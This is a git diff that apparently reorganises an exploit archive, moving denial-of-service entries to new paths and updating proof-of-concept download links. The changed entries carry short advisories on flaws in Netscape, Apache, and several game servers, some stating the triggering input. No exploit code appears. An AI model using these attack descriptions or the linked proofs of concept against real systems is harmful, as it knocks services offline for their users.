platforms/multiple/dos/20098.txt rename to exploits/multiple/dos/20098.txt index 4fa4954c5..8c699dca5 100644 --- a/platforms/multiple/dos/20098.txt +++ b/exploits/multiple/dos/20098.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1503/info Netscape Browsers use the Independent JPEG Group's decoder library to process JPEG encoded images. The library functions skip JPEG comments; however, the browser uses a custom function to process these comments and store them in memory. The comment includes a 2-byte "length" field which indicates how long the comment is - this value includes the 2-bytes of the "length" field. To determine the length of the comment string alone (for memory allocation), the function reads the value in the "length" field and subtracts two. The function then allocates the length of the comment + one byte for NULL termination. There is no error checking to ensure the "length" value is valid. This makes it possible to cause an overflow by creating an image with a comment "length" field containing the value 1. The memory allocation call of 0 bytes (1 minus 2 (length field) + 1 (null termination)) will succeed. The calculated comment size variable is declared unsigned, resulting in a large positive value (from 1 minus 2). The comment handling function goes into a loop to read the comment into memory, but since the calculated comment size is enormous this causes the function to read the entire JPEG stream, overwriting the heap. It is theoretically possible to exploit this to execute arbitrary code. The browser, mail and news readers are all vulnerable to this. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20098.jpg \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20098.jpg \ No newline at end of file diff --git a/platforms/multiple/dos/20178.pl b/exploits/multiple/dos/20178.pl similarity index 100% rename from platforms/multiple/dos/20178.pl rename to exploits/multiple/dos/20178.pl diff --git a/platforms/multiple/dos/20229.txt b/exploits/multiple/dos/20229.txt similarity index 100% rename from platforms/multiple/dos/20229.txt rename to exploits/multiple/dos/20229.txt diff --git a/platforms/multiple/dos/20239.txt b/exploits/multiple/dos/20239.txt similarity index 100% rename from platforms/multiple/dos/20239.txt rename to exploits/multiple/dos/20239.txt diff --git a/platforms/multiple/dos/20336.txt b/exploits/multiple/dos/20336.txt similarity index 100% rename from platforms/multiple/dos/20336.txt rename to exploits/multiple/dos/20336.txt diff --git a/platforms/multiple/dos/20531.txt b/exploits/multiple/dos/20531.txt similarity index 100% rename from platforms/multiple/dos/20531.txt rename to exploits/multiple/dos/20531.txt diff --git a/platforms/multiple/dos/20534.txt b/exploits/multiple/dos/20534.txt similarity index 100% rename from platforms/multiple/dos/20534.txt rename to exploits/multiple/dos/20534.txt diff --git a/platforms/multiple/dos/20558.txt b/exploits/multiple/dos/20558.txt similarity index 91% rename from platforms/multiple/dos/20558.txt rename to exploits/multiple/dos/20558.txt index 9638c65ff..785cda135 100644 --- a/platforms/multiple/dos/20558.txt +++ b/exploits/multiple/dos/20558.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2216/info Apache Web Server 1.2 and previous versions are subject to a denial of service. By requesting a malformed GET request composed of an unusually large number of '/' characters, an attacker can cause CPU usage to spike. A restart of the service is required to gain normal functionality. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20558.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20558.zip \ No newline at end of file diff --git a/platforms/multiple/dos/20610.txt b/exploits/multiple/dos/20610.txt similarity index 100% rename from platforms/multiple/dos/20610.txt rename to exploits/multiple/dos/20610.txt diff --git a/platforms/multiple/dos/20659.txt b/exploits/multiple/dos/20659.txt similarity index 100% rename from platforms/multiple/dos/20659.txt rename to exploits/multiple/dos/20659.txt diff --git a/platforms/multiple/dos/20705.py b/exploits/multiple/dos/20705.py similarity index 100% rename from platforms/multiple/dos/20705.py rename to exploits/multiple/dos/20705.py diff --git a/platforms/multiple/dos/2073.c b/exploits/multiple/dos/2073.c similarity index 100% rename from platforms/multiple/dos/2073.c rename to exploits/multiple/dos/2073.c diff --git a/platforms/multiple/dos/20792.txt b/exploits/multiple/dos/20792.txt similarity index 100% rename from platforms/multiple/dos/20792.txt rename to exploits/multiple/dos/20792.txt diff --git a/platforms/multiple/dos/20810.c b/exploits/multiple/dos/20810.c similarity index 100% rename from platforms/multiple/dos/20810.c rename to exploits/multiple/dos/20810.c diff --git a/platforms/multiple/dos/20811.cpp b/exploits/multiple/dos/20811.cpp similarity index 100% rename from platforms/multiple/dos/20811.cpp rename to exploits/multiple/dos/20811.cpp diff --git a/platforms/multiple/dos/20813.c b/exploits/multiple/dos/20813.c similarity index 100% rename from platforms/multiple/dos/20813.c rename to exploits/multiple/dos/20813.c diff --git a/platforms/multiple/dos/20827.pl b/exploits/multiple/dos/20827.pl similarity index 100% rename from platforms/multiple/dos/20827.pl rename to exploits/multiple/dos/20827.pl diff --git a/platforms/multiple/dos/20852.pl b/exploits/multiple/dos/20852.pl similarity index 100% rename from platforms/multiple/dos/20852.pl rename to exploits/multiple/dos/20852.pl diff --git a/platforms/multiple/dos/20853.php b/exploits/multiple/dos/20853.php similarity index 100% rename from platforms/multiple/dos/20853.php rename to exploits/multiple/dos/20853.php diff --git a/platforms/multiple/dos/20973.txt b/exploits/multiple/dos/20973.txt similarity index 100% rename from platforms/multiple/dos/20973.txt rename to exploits/multiple/dos/20973.txt diff --git a/platforms/multiple/dos/20997.c b/exploits/multiple/dos/20997.c similarity index 100% rename from platforms/multiple/dos/20997.c rename to exploits/multiple/dos/20997.c diff --git a/platforms/multiple/dos/21012.c b/exploits/multiple/dos/21012.c similarity index 100% rename from platforms/multiple/dos/21012.c rename to exploits/multiple/dos/21012.c diff --git a/platforms/multiple/dos/21041.txt b/exploits/multiple/dos/21041.txt similarity index 100% rename from platforms/multiple/dos/21041.txt rename to exploits/multiple/dos/21041.txt diff --git a/platforms/multiple/dos/21042.txt b/exploits/multiple/dos/21042.txt similarity index 100% rename from platforms/multiple/dos/21042.txt rename to exploits/multiple/dos/21042.txt diff --git a/platforms/multiple/dos/21126.c b/exploits/multiple/dos/21126.c similarity index 100% rename from platforms/multiple/dos/21126.c rename to exploits/multiple/dos/21126.c diff --git a/platforms/multiple/dos/21181.txt b/exploits/multiple/dos/21181.txt similarity index 100% rename from platforms/multiple/dos/21181.txt rename to exploits/multiple/dos/21181.txt diff --git a/platforms/multiple/dos/21213.txt b/exploits/multiple/dos/21213.txt similarity index 100% rename from platforms/multiple/dos/21213.txt rename to exploits/multiple/dos/21213.txt diff --git a/platforms/multiple/dos/21232.c b/exploits/multiple/dos/21232.c similarity index 100% rename from platforms/multiple/dos/21232.c rename to exploits/multiple/dos/21232.c diff --git a/platforms/multiple/dos/21337.c b/exploits/multiple/dos/21337.c similarity index 100% rename from platforms/multiple/dos/21337.c rename to exploits/multiple/dos/21337.c diff --git a/platforms/multiple/dos/21379.pl b/exploits/multiple/dos/21379.pl similarity index 100% rename from platforms/multiple/dos/21379.pl rename to exploits/multiple/dos/21379.pl diff --git a/platforms/multiple/dos/21413.txt b/exploits/multiple/dos/21413.txt similarity index 100% rename from platforms/multiple/dos/21413.txt rename to exploits/multiple/dos/21413.txt diff --git a/platforms/multiple/dos/21539.c b/exploits/multiple/dos/21539.c similarity index 100% rename from platforms/multiple/dos/21539.c rename to exploits/multiple/dos/21539.c diff --git a/platforms/multiple/dos/21544.html b/exploits/multiple/dos/21544.html similarity index 100% rename from platforms/multiple/dos/21544.html rename to exploits/multiple/dos/21544.html diff --git a/platforms/multiple/dos/21572.txt b/exploits/multiple/dos/21572.txt similarity index 94% rename from platforms/multiple/dos/21572.txt rename to exploits/multiple/dos/21572.txt index 37e26bd12..355860a24 100644 --- a/platforms/multiple/dos/21572.txt +++ b/exploits/multiple/dos/21572.txt @@ -4,4 +4,4 @@ Half-Life is a popular game distributed and maintained by Valve Software. It inc A denial of service vulnerability has been reported in some versions of the Half-Life server. A remote party may create a large number of new users on a specific server through spoofing the connection conversation. As servers contain a set limit on the maximum number of players, server resources will be exhausted, and legitimate players will not be allowed to join the game. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21572.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21572.zip \ No newline at end of file diff --git a/platforms/multiple/dos/21575.txt b/exploits/multiple/dos/21575.txt similarity index 100% rename from platforms/multiple/dos/21575.txt rename to exploits/multiple/dos/21575.txt diff --git a/platforms/multiple/dos/21593.txt b/exploits/multiple/dos/21593.txt similarity index 93% rename from platforms/multiple/dos/21593.txt rename to exploits/multiple/dos/21593.txt index 5d63639d6..6a1fa1b5c 100644 --- a/platforms/multiple/dos/21593.txt +++ b/exploits/multiple/dos/21593.txt @@ -4,4 +4,4 @@ Unreal Tournament is a game produced by Epic Games, available for Microsoft Wind It is possible to use an Unreal Tournament server as an amplifyer in a flooding attack, by transmiting multiple UDP packets with a spoofed victim IP address. The server will make repeated attempts to initiate a connection with the specified address, consuming network resources. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21593.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21593.tgz \ No newline at end of file diff --git a/platforms/multiple/dos/21782.txt b/exploits/multiple/dos/21782.txt similarity index 100% rename from platforms/multiple/dos/21782.txt rename to exploits/multiple/dos/21782.txt diff --git a/platforms/multiple/dos/2179.c b/exploits/multiple/dos/2179.c similarity index 100% rename from platforms/multiple/dos/2179.c rename to exploits/multiple/dos/2179.c diff --git a/platforms/multiple/dos/2180.py b/exploits/multiple/dos/2180.py similarity index 100% rename from platforms/multiple/dos/2180.py rename to exploits/multiple/dos/2180.py diff --git a/platforms/multiple/dos/21911.txt b/exploits/multiple/dos/21911.txt similarity index 100% rename from platforms/multiple/dos/21911.txt rename to exploits/multiple/dos/21911.txt diff --git a/platforms/multiple/dos/22010.txt b/exploits/multiple/dos/22010.txt similarity index 100% rename from platforms/multiple/dos/22010.txt rename to exploits/multiple/dos/22010.txt diff --git a/platforms/multiple/dos/22053.txt b/exploits/multiple/dos/22053.txt similarity index 100% rename from platforms/multiple/dos/22053.txt rename to exploits/multiple/dos/22053.txt diff --git a/platforms/multiple/dos/22207.txt b/exploits/multiple/dos/22207.txt similarity index 100% rename from platforms/multiple/dos/22207.txt rename to exploits/multiple/dos/22207.txt diff --git a/platforms/multiple/dos/22223.txt b/exploits/multiple/dos/22223.txt similarity index 100% rename from platforms/multiple/dos/22223.txt rename to exploits/multiple/dos/22223.txt diff --git a/platforms/multiple/dos/22230.pl b/exploits/multiple/dos/22230.pl similarity index 100% rename from platforms/multiple/dos/22230.pl rename to exploits/multiple/dos/22230.pl diff --git a/platforms/multiple/dos/22250.sh b/exploits/multiple/dos/22250.sh similarity index 100% rename from platforms/multiple/dos/22250.sh rename to exploits/multiple/dos/22250.sh diff --git a/platforms/multiple/dos/22345.txt b/exploits/multiple/dos/22345.txt similarity index 100% rename from platforms/multiple/dos/22345.txt rename to exploits/multiple/dos/22345.txt diff --git a/platforms/multiple/dos/22358.cfm b/exploits/multiple/dos/22358.cfm similarity index 100% rename from platforms/multiple/dos/22358.cfm rename to exploits/multiple/dos/22358.cfm diff --git a/platforms/multiple/dos/22359.xsl b/exploits/multiple/dos/22359.xsl similarity index 100% rename from platforms/multiple/dos/22359.xsl rename to exploits/multiple/dos/22359.xsl diff --git a/platforms/multiple/dos/22360.java b/exploits/multiple/dos/22360.java similarity index 100% rename from platforms/multiple/dos/22360.java rename to exploits/multiple/dos/22360.java diff --git a/platforms/multiple/dos/2244.pl b/exploits/multiple/dos/2244.pl similarity index 100% rename from platforms/multiple/dos/2244.pl rename to exploits/multiple/dos/2244.pl diff --git a/platforms/multiple/dos/22441.txt b/exploits/multiple/dos/22441.txt similarity index 100% rename from platforms/multiple/dos/22441.txt rename to exploits/multiple/dos/22441.txt diff --git a/platforms/multiple/dos/22502.pl b/exploits/multiple/dos/22502.pl similarity index 100% rename from platforms/multiple/dos/22502.pl rename to exploits/multiple/dos/22502.pl diff --git a/platforms/multiple/dos/22503.c b/exploits/multiple/dos/22503.c similarity index 100% rename from platforms/multiple/dos/22503.c rename to exploits/multiple/dos/22503.c diff --git a/platforms/multiple/dos/22505.txt b/exploits/multiple/dos/22505.txt similarity index 100% rename from platforms/multiple/dos/22505.txt rename to exploits/multiple/dos/22505.txt diff --git a/platforms/multiple/dos/22512.txt b/exploits/multiple/dos/22512.txt similarity index 100% rename from platforms/multiple/dos/22512.txt rename to exploits/multiple/dos/22512.txt diff --git a/platforms/multiple/dos/22514.txt b/exploits/multiple/dos/22514.txt similarity index 100% rename from platforms/multiple/dos/22514.txt rename to exploits/multiple/dos/22514.txt diff --git a/platforms/multiple/dos/22535.txt b/exploits/multiple/dos/22535.txt similarity index 100% rename from platforms/multiple/dos/22535.txt rename to exploits/multiple/dos/22535.txt diff --git a/platforms/multiple/dos/22536.txt b/exploits/multiple/dos/22536.txt similarity index 100% rename from platforms/multiple/dos/22536.txt rename to exploits/multiple/dos/22536.txt diff --git a/platforms/multiple/dos/22634.txt b/exploits/multiple/dos/22634.txt similarity index 100% rename from platforms/multiple/dos/22634.txt rename to exploits/multiple/dos/22634.txt diff --git a/platforms/multiple/dos/22650.py b/exploits/multiple/dos/22650.py similarity index 100% rename from platforms/multiple/dos/22650.py rename to exploits/multiple/dos/22650.py diff --git a/platforms/multiple/dos/22859.txt b/exploits/multiple/dos/22859.txt similarity index 100% rename from platforms/multiple/dos/22859.txt rename to exploits/multiple/dos/22859.txt diff --git a/platforms/multiple/dos/22926.txt b/exploits/multiple/dos/22926.txt similarity index 100% rename from platforms/multiple/dos/22926.txt rename to exploits/multiple/dos/22926.txt diff --git a/platforms/multiple/dos/22935.txt b/exploits/multiple/dos/22935.txt similarity index 100% rename from platforms/multiple/dos/22935.txt rename to exploits/multiple/dos/22935.txt diff --git a/platforms/multiple/dos/22987.pl b/exploits/multiple/dos/22987.pl similarity index 100% rename from platforms/multiple/dos/22987.pl rename to exploits/multiple/dos/22987.pl diff --git a/platforms/multiple/dos/2303.html b/exploits/multiple/dos/2303.html similarity index 100% rename from platforms/multiple/dos/2303.html rename to exploits/multiple/dos/2303.html diff --git a/platforms/multiple/dos/23050.txt b/exploits/multiple/dos/23050.txt similarity index 100% rename from platforms/multiple/dos/23050.txt rename to exploits/multiple/dos/23050.txt diff --git a/platforms/multiple/dos/23051.txt b/exploits/multiple/dos/23051.txt similarity index 100% rename from platforms/multiple/dos/23051.txt rename to exploits/multiple/dos/23051.txt diff --git a/platforms/multiple/dos/23142.txt b/exploits/multiple/dos/23142.txt similarity index 100% rename from platforms/multiple/dos/23142.txt rename to exploits/multiple/dos/23142.txt diff --git a/platforms/multiple/dos/23181.txt b/exploits/multiple/dos/23181.txt similarity index 100% rename from platforms/multiple/dos/23181.txt rename to exploits/multiple/dos/23181.txt diff --git a/platforms/multiple/dos/23231.txt b/exploits/multiple/dos/23231.txt similarity index 94% rename from platforms/multiple/dos/23231.txt rename to exploits/multiple/dos/23231.txt index dd5d65373..d6ecad9b8 100644 --- a/platforms/multiple/dos/23231.txt +++ b/exploits/multiple/dos/23231.txt @@ -6,4 +6,4 @@ Successful exploitation of this issue may allow an attacker to cause the softwar Medieval Total War versions 1.1 and prior are reported to be prone to this vulnerability. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23231.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23231.zip \ No newline at end of file diff --git a/platforms/multiple/dos/23263.txt b/exploits/multiple/dos/23263.txt similarity index 100% rename from platforms/multiple/dos/23263.txt rename to exploits/multiple/dos/23263.txt diff --git a/platforms/multiple/dos/23276.java b/exploits/multiple/dos/23276.java similarity index 100% rename from platforms/multiple/dos/23276.java rename to exploits/multiple/dos/23276.java diff --git a/platforms/multiple/dos/23292.java b/exploits/multiple/dos/23292.java similarity index 100% rename from platforms/multiple/dos/23292.java rename to exploits/multiple/dos/23292.java diff --git a/platforms/multiple/dos/23314.c b/exploits/multiple/dos/23314.c similarity index 100% rename from platforms/multiple/dos/23314.c rename to exploits/multiple/dos/23314.c diff --git a/platforms/multiple/dos/23325.c b/exploits/multiple/dos/23325.c similarity index 100% rename from platforms/multiple/dos/23325.c rename to exploits/multiple/dos/23325.c diff --git a/platforms/multiple/dos/23390.txt b/exploits/multiple/dos/23390.txt similarity index 100% rename from platforms/multiple/dos/23390.txt rename to exploits/multiple/dos/23390.txt diff --git a/platforms/multiple/dos/23431.pl b/exploits/multiple/dos/23431.pl similarity index 100% rename from platforms/multiple/dos/23431.pl rename to exploits/multiple/dos/23431.pl diff --git a/platforms/multiple/dos/23444.pl b/exploits/multiple/dos/23444.pl similarity index 100% rename from platforms/multiple/dos/23444.pl rename to exploits/multiple/dos/23444.pl diff --git a/platforms/multiple/dos/23524.c b/exploits/multiple/dos/23524.c similarity index 100% rename from platforms/multiple/dos/23524.c rename to exploits/multiple/dos/23524.c diff --git a/platforms/multiple/dos/23543.txt b/exploits/multiple/dos/23543.txt similarity index 100% rename from platforms/multiple/dos/23543.txt rename to exploits/multiple/dos/23543.txt diff --git a/platforms/multiple/dos/23556.txt b/exploits/multiple/dos/23556.txt similarity index 92% rename from platforms/multiple/dos/23556.txt rename to exploits/multiple/dos/23556.txt index a72b5085c..28c5c3d63 100644 --- a/platforms/multiple/dos/23556.txt +++ b/exploits/multiple/dos/23556.txt @@ -4,4 +4,4 @@ The GetWare Web Server component has been reported prone to a remote denial of s A remote attacker may exploit this issue to deny service to the GetWare Web Server. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23556.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23556.rar \ No newline at end of file diff --git a/platforms/multiple/dos/23590.txt b/exploits/multiple/dos/23590.txt similarity index 100% rename from platforms/multiple/dos/23590.txt rename to exploits/multiple/dos/23590.txt diff --git a/platforms/multiple/dos/23641.txt b/exploits/multiple/dos/23641.txt similarity index 93% rename from platforms/multiple/dos/23641.txt rename to exploits/multiple/dos/23641.txt index b9c282f15..bd4f03e97 100644 --- a/platforms/multiple/dos/23641.txt +++ b/exploits/multiple/dos/23641.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9567/info Chaser has been reported to be prone to a denial of service vulnerability. This issue is caused by a lack of input validation of a size parameter specified in UDP network communication packets. The process will attempt to read the amount of data specified by the packet, without regard to the amount of memory allocated. This will cause an attempt by the application to dereference unallocated memory, producing an exception and causing the process to crash. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23641.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23641.rar \ No newline at end of file diff --git a/platforms/multiple/dos/23642.txt b/exploits/multiple/dos/23642.txt similarity index 93% rename from platforms/multiple/dos/23642.txt rename to exploits/multiple/dos/23642.txt index 33710d091..65a114b74 100644 --- a/platforms/multiple/dos/23642.txt +++ b/exploits/multiple/dos/23642.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9567/info Chaser has been reported to be prone to a denial of service vulnerability. This issue is caused by a lack of input validation of a size parameter specified in UDP network communication packets. The process will attempt to read the amount of data specified by the packet, without regard to the amount of memory allocated. This will cause an attempt by the application to dereference unallocated memory, producing an exception and causing the process to crash. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23642.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23642.rar \ No newline at end of file diff --git a/platforms/multiple/dos/23656.txt b/exploits/multiple/dos/23656.txt similarity index 100% rename from platforms/multiple/dos/23656.txt rename to exploits/multiple/dos/23656.txt diff --git a/platforms/multiple/dos/23755.txt b/exploits/multiple/dos/23755.txt similarity index 92% rename from platforms/multiple/dos/23755.txt rename to exploits/multiple/dos/23755.txt index 7344ad96f..5376e8c75 100644 --- a/platforms/multiple/dos/23755.txt +++ b/exploits/multiple/dos/23755.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9738/info The Ghost Recon Game Engine has been reported prone to a denial of service vulnerability. When handling text strings, the Ghost Recon Game Engine employs a 32-bit integer string size prefix in order to monitor the size of the string. It has been reported that when an invalid size value is supplied an exception will be triggered causing a system wide denial of service. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23755.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23755.rar \ No newline at end of file diff --git a/platforms/multiple/dos/23787.txt b/exploits/multiple/dos/23787.txt similarity index 100% rename from platforms/multiple/dos/23787.txt rename to exploits/multiple/dos/23787.txt diff --git a/platforms/multiple/dos/23799.txt b/exploits/multiple/dos/23799.txt similarity index 100% rename from platforms/multiple/dos/23799.txt rename to exploits/multiple/dos/23799.txt diff --git a/platforms/multiple/dos/23805.txt b/exploits/multiple/dos/23805.txt similarity index 88% rename from platforms/multiple/dos/23805.txt rename to exploits/multiple/dos/23805.txt index 02d0c3811..c9f4881f4 100644 --- a/platforms/multiple/dos/23805.txt +++ b/exploits/multiple/dos/23805.txt @@ -2,6 +2,6 @@ source: http://www.securityfocus.com/bid/9849/info The Battle Mages game server has been reported to be prone to a remote denial of service vulnerability. The issue is reported to present itself when the server receives incomplete client data. Specifically the affected server will attempt to read the expected data size infinitely until it is received, this may allow a remote attacker to tie up server resources and effectively deny service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23805-1.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23805-1.rar -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23805-2.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23805-2.rar \ No newline at end of file diff --git a/platforms/multiple/dos/23902.txt b/exploits/multiple/dos/23902.txt similarity index 91% rename from platforms/multiple/dos/23902.txt rename to exploits/multiple/dos/23902.txt index 3ca00b7a1..106a954fa 100644 --- a/platforms/multiple/dos/23902.txt +++ b/exploits/multiple/dos/23902.txt @@ -4,4 +4,4 @@ Roger Wilco Server has been reported prone to a remote denial of service vulnera A remote attacker may exploit this condition to deny service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23902.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23902.zip \ No newline at end of file diff --git a/platforms/multiple/dos/23904.txt b/exploits/multiple/dos/23904.txt similarity index 94% rename from platforms/multiple/dos/23904.txt rename to exploits/multiple/dos/23904.txt index 7131f84a0..0df8e93d6 100644 --- a/platforms/multiple/dos/23904.txt +++ b/exploits/multiple/dos/23904.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/10025/info A vulnerability has been reported in the Roger Wilco Server, it is reported that a user does not need to connect to the server over the TCP port to have UDP based audio streams handled. Rather the attacker will require knowledge of user ID's connected to a target channel. Because the user ID's for a channel exist in a range of 0-127, the attacker may transmit an audio stream to an affected server that will be heard by all connected users, however the server administrator will have no control over disconnecting or muting this audio stream. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23904.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23904.zip \ No newline at end of file diff --git a/platforms/multiple/dos/24011.pl b/exploits/multiple/dos/24011.pl similarity index 100% rename from platforms/multiple/dos/24011.pl rename to exploits/multiple/dos/24011.pl diff --git a/platforms/multiple/dos/24013.txt b/exploits/multiple/dos/24013.txt similarity index 100% rename from platforms/multiple/dos/24013.txt rename to exploits/multiple/dos/24013.txt diff --git a/platforms/multiple/dos/24066.txt b/exploits/multiple/dos/24066.txt similarity index 100% rename from platforms/multiple/dos/24066.txt rename to exploits/multiple/dos/24066.txt diff --git a/platforms/multiple/dos/24070.txt b/exploits/multiple/dos/24070.txt similarity index 100% rename from platforms/multiple/dos/24070.txt rename to exploits/multiple/dos/24070.txt diff --git a/platforms/multiple/dos/24130.txt b/exploits/multiple/dos/24130.txt similarity index 100% rename from platforms/multiple/dos/24130.txt rename to exploits/multiple/dos/24130.txt diff --git a/platforms/multiple/dos/24170.txt b/exploits/multiple/dos/24170.txt similarity index 94% rename from platforms/multiple/dos/24170.txt rename to exploits/multiple/dos/24170.txt index ebf5e075d..170aca2e3 100644 --- a/platforms/multiple/dos/24170.txt +++ b/exploits/multiple/dos/24170.txt @@ -6,4 +6,4 @@ When entering the multiplayer menu, the game client sends a broadcast message re An attacker running a malicious server process could block all multiplayer access in a local network, denying service to all legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24170.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24170.zip \ No newline at end of file diff --git a/platforms/multiple/dos/24242.java b/exploits/multiple/dos/24242.java similarity index 100% rename from platforms/multiple/dos/24242.java rename to exploits/multiple/dos/24242.java diff --git a/platforms/multiple/dos/24247.txt b/exploits/multiple/dos/24247.txt similarity index 100% rename from platforms/multiple/dos/24247.txt rename to exploits/multiple/dos/24247.txt diff --git a/platforms/multiple/dos/24282.txt b/exploits/multiple/dos/24282.txt similarity index 100% rename from platforms/multiple/dos/24282.txt rename to exploits/multiple/dos/24282.txt diff --git a/platforms/multiple/dos/24283.txt b/exploits/multiple/dos/24283.txt similarity index 100% rename from platforms/multiple/dos/24283.txt rename to exploits/multiple/dos/24283.txt diff --git a/platforms/multiple/dos/24305.txt b/exploits/multiple/dos/24305.txt similarity index 100% rename from platforms/multiple/dos/24305.txt rename to exploits/multiple/dos/24305.txt diff --git a/platforms/multiple/dos/24351.c b/exploits/multiple/dos/24351.c similarity index 100% rename from platforms/multiple/dos/24351.c rename to exploits/multiple/dos/24351.c diff --git a/platforms/multiple/dos/24352.java b/exploits/multiple/dos/24352.java similarity index 100% rename from platforms/multiple/dos/24352.java rename to exploits/multiple/dos/24352.java diff --git a/platforms/multiple/dos/24386.txt b/exploits/multiple/dos/24386.txt similarity index 100% rename from platforms/multiple/dos/24386.txt rename to exploits/multiple/dos/24386.txt diff --git a/platforms/multiple/dos/24388.txt b/exploits/multiple/dos/24388.txt similarity index 100% rename from platforms/multiple/dos/24388.txt rename to exploits/multiple/dos/24388.txt diff --git a/platforms/multiple/dos/24394.txt b/exploits/multiple/dos/24394.txt similarity index 100% rename from platforms/multiple/dos/24394.txt rename to exploits/multiple/dos/24394.txt diff --git a/platforms/multiple/dos/24423.txt b/exploits/multiple/dos/24423.txt similarity index 100% rename from platforms/multiple/dos/24423.txt rename to exploits/multiple/dos/24423.txt diff --git a/platforms/multiple/dos/2444.sh b/exploits/multiple/dos/2444.sh similarity index 100% rename from platforms/multiple/dos/2444.sh rename to exploits/multiple/dos/2444.sh diff --git a/platforms/multiple/dos/24486.txt b/exploits/multiple/dos/24486.txt similarity index 95% rename from platforms/multiple/dos/24486.txt rename to exploits/multiple/dos/24486.txt index 848022ed0..0407a0702 100644 --- a/platforms/multiple/dos/24486.txt +++ b/exploits/multiple/dos/24486.txt @@ -44,4 +44,4 @@ can be performed on any HTTP Authentication portal. RECOMMENDATIONS Reference how Firefox and Safari handle the attached code. -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24486.tar.gz \ No newline at end of file +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24486.tar.gz \ No newline at end of file diff --git a/platforms/multiple/dos/24592.txt b/exploits/multiple/dos/24592.txt similarity index 100% rename from platforms/multiple/dos/24592.txt rename to exploits/multiple/dos/24592.txt diff --git a/platforms/multiple/dos/24597.txt b/exploits/multiple/dos/24597.txt similarity index 100% rename from platforms/multiple/dos/24597.txt rename to exploits/multiple/dos/24597.txt diff --git a/platforms/multiple/dos/24610.txt b/exploits/multiple/dos/24610.txt similarity index 100% rename from platforms/multiple/dos/24610.txt rename to exploits/multiple/dos/24610.txt diff --git a/platforms/multiple/dos/24668.txt b/exploits/multiple/dos/24668.txt similarity index 92% rename from platforms/multiple/dos/24668.txt rename to exploits/multiple/dos/24668.txt index f03d32019..729e9594d 100644 --- a/platforms/multiple/dos/24668.txt +++ b/exploits/multiple/dos/24668.txt @@ -4,4 +4,4 @@ Flash Messaging server is reported prone to a remote denial of service vulnerabi Flash Messaging server 5.2.0g and prior versions are reported prone to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24668.tar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24668.tar \ No newline at end of file diff --git a/platforms/multiple/dos/24691.txt b/exploits/multiple/dos/24691.txt similarity index 90% rename from platforms/multiple/dos/24691.txt rename to exploits/multiple/dos/24691.txt index 84e4d7724..f1fc5af95 100644 --- a/platforms/multiple/dos/24691.txt +++ b/exploits/multiple/dos/24691.txt @@ -6,4 +6,4 @@ It is reported that, when handled, a sufficiently malformed audio stream will ca An attacker may exploit this condition to deny service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24691.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24691.zip \ No newline at end of file diff --git a/platforms/multiple/dos/24710.txt b/exploits/multiple/dos/24710.txt similarity index 100% rename from platforms/multiple/dos/24710.txt rename to exploits/multiple/dos/24710.txt diff --git a/platforms/multiple/dos/24715.txt b/exploits/multiple/dos/24715.txt similarity index 100% rename from platforms/multiple/dos/24715.txt rename to exploits/multiple/dos/24715.txt diff --git a/platforms/multiple/dos/24761.txt b/exploits/multiple/dos/24761.txt similarity index 91% rename from platforms/multiple/dos/24761.txt rename to exploits/multiple/dos/24761.txt index 64fb94df9..d74e147da 100644 --- a/platforms/multiple/dos/24761.txt +++ b/exploits/multiple/dos/24761.txt @@ -4,4 +4,4 @@ The Halo game client is reported prone to a remote denial of service vulnerabili A remote attacker may exploit this vulnerability to deny service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24761.zip \ No newline at end of file 